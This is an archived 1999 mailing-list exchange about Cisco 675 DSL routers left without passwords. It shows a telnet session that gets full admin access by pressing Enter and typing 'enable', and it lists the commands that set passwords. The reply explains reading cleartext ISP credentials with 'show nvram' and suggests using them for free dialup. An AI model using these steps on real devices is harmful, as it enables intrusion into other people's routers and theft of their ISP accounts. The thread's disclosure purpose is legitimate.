The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Cisco 675 password nonsense


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 3 Aug 1999 13:32:27 -0400
From: The Tech-Admin Dude <geniusj@PHOENIX.UNACOM.COM.>
To: [email protected]
Subject: Re: Cisco 675 password nonsense

This is pretty well known, and not to mention that you can really get free
dialups through this method by doing 'show nvram' and reading the
username and password in the display, for example..
cbos# show nvram
<snip>
PPP Port User Name = 00, username
PPP Port User Password = 00, mycleartextpass
<snip>

Since this anonymous ISP provides 'roaming' access with their DSLs, if you
are in their 14 state region, you can use that l/p combination to have a
free dialup.. there are numerous other things you can do from the router,
but I'm sure everyone could figure it out..

------------------------------------------------------------------------------
Jason DiCioccio                              | [email protected]
FreeBSD - The Power to Serve                 | http://www.freebsd.org
Tel: (303) 984-5311                          | http://www.nailed.com
------------------------------------------------------------------------------

On Sat, 31 Jul 1999, DeMoNx wrote:

> (First of all please forgive me if you dis-approve of my use of the word
> router. I just think it's a bot more appropriate term than 'modem' for the
> hardware being discussed.)
>
> Is your DSL router an open book???
>
> When a certain long distance provider/isp in my area began forcefully
> switching all non-business/special adsl accounts over to using PPP rather
> than bridging mode for 'security reasons', I got a little suspicious. With
> bridging mode enabled on a Cisco 675, one used to be able to hook up
> seemingly limitless machines (provided you have the hubs), to one dsl
> connection using dhcp. Now with PPP, your dhcp server becomes
> 10.10.10.0...your 675, which in turn uses dhcp or ipcp to handle
> traffic between itself and your isp....blah blah blah etc.
>
> My point is, with all this wonderfully confusing hubub, many people I'm
> sure are pulling their hair out trying to fathom the first 5 pages of the
> 'CBOS Users Guide', trying in vain to set up their dsl to avoid paying $90
> to the guys that will end up coming to their house and setting it up for
> them. The problem is, *most* of these guys don't set passwords on the
> 675's. It is very simple to compromise an unpassworded 675. simply hit
> 'enter' at the password prompt after telnetting in, if you get a cbos>
> promt you are half way there, NOT GOOD. If there is no exec mode password
> set, then there most likely won't be an enable(superuser) mode password
> either. So, at this prompt you simply type 'enable' and hit enter twice.
> If you are in enable mode, your prompt will change to the # symbol, and
> you have full access to all the router's settings. ISP's are letting this
> happen, people are buying this technology without any knowlege that they
> may be at this kind of risk. Below is a log of one such Cisco 675. The
> ip's and hostnames have been changed to protect the irresponsible *and*
> the uninformed.
>
> ---
>
>
> $telnet adslppp93.lame.isp.net Trying 296.161.127.93...
> Connected to adslppp93.lame.isp.net.
> Escape character is '^]'.
>
> User Access Verification
> Password:                  (Just hit enter, whoa! No password!)
>
> cbos>enable                (with just 8 keystrokes full access is given)
>
> Password:
>
> cbos#stats ppp             (Hmm, who's 675 is this?)
>
> VC       VPI/VCI  STATE          MRU    USERNAME  RADIUS   TX       RX
> wan0-0   01/01   Opened State    2048   poorsap   disabled 358673   358956
>
> cbos#exit
> Connection closed by foreign host.
>
> now, to change these passwords (the easiest way of securing the router)
>
> type 'enable' hit enter to enter administration mode
>
> then type 'set password exec clear NEWPASSWORD exec' to keep em out
>
> and then 'set password enable clear NEWPASSWORD enable' to change the
> superuser password.
>
> This is what the person who setup the 675 *SHOULD* have done prior to
> leaving the jobsite.
>
> Bill Watts
>


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру